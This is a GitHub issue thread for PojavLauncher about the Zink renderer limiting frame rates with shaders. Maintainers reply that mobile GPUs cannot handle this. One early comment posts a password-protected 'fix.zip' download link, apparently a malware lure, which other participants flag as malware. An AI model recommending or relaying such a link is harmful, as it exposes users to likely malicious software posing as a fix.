### ISSUE TITLE
Maie a new renderer for shaders and performance 

### ISSUE THREAD

**Issue by rishabha102010** [PojavLauncherTeam/PojavLauncher#5980]
### Is this request related to a bug?

Yes because zink renderer limits the game fps no matter what turning off allow vsync with zink still limits the fps shaders are laggy

### Describe the request.

If you managed to make new renderer for shaders with no fps limit it's better

### Anything else?

Please make it thank you

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rishabha102010** [comment]
How do I instal?

**Comment by rishabha102010** [comment]
What to do these

**Comment by mishpro-programm** [comment]
This is probably a malware

**Comment by rishabha102010** [comment]
??

**Comment by ghost** [comment]
> ### Is this request related to a bug?
> Yes because zink renderer limits the game fps no matter what turning off allow vsync with zink still limits the fps shaders are laggy
> 
> ### Describe the request.
> If you managed to make new renderer for shaders with no fps limit it's better
> 
> ### Anything else?
> Please make it thank you

It's already going to merge
https://github.com/PojavLauncherTeam/PojavLauncher/pull/5979

**Comment by kasrarouhi** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

It's malwar

**Comment by rishabha102010** [comment]
Ok than you

**Comment by rishabha102010** [comment]
Ok thank you

**Comment by rishabha102010** [comment]
Well do you guys doing something for my issue

**Comment by ghost** [comment]
> Well do you guys doing something for my issue

Probably they are do

**Comment by rishabha102010** [comment]
Ok for the all versions fast or this issue?

**Comment by ghost** [comment]
all versions fast for zink vulkan

**Comment by rishabha102010** [comment]
Thank you

**Comment by rishabha102010** [comment]
How much time takes to add my workflow?

**Comment by ghost** [comment]
> How much time takes to add my workflow?

I don't know I'm not a developer

**Comment by rishabha102010** [comment]
It's showing awaiting approvel from the maintainer what does it mean?

**Comment by khanhduytran0** [comment]
Hey @rishabha102010, you must understand that we are **not** Nvidia engineers, nor anyone close to graphics engineers to construct a complete OpenGL translator that works with literally every single shader that you throw in *with fancy ray tracing effects you’d expect too* on a tiny mobile GPU. This is completely beyond our reach.
You see, your phone doesn’t have a Nvidia GPU, which explains why either shaders would run at crappy fps or not working at all.
Not to mention, this is not our full time project. We do not work like 12 hours a day and are barely paid for this. We’re just hobbyist developers working in our free time. So please don’t expect much, thank you.

**Comment by khanhduytran0** [comment]
Technically, mobile GPUs are limited enough that the translator has to *emulate* a lot of things, which is why shaders will slow down everything. If you find a way to plug a RTX 4090 into your phone and is still experiencing laggy, let us know :)

**Comment by kasrarouhi** [comment]
True

**Comment by ghost** [comment]
No matter how much I think, it fits with reason. Android gpu and CPU doesn't have good processors than pc
See
https://www.youtube.com/watch?v=2SdIMiEjKD4

**Comment by rishabha102010** [comment]
Iknbro sirry

**Comment by rishabha102010** [comment]
Ok bro sorry

**Comment by ghost** [comment]
Don't bother yourself
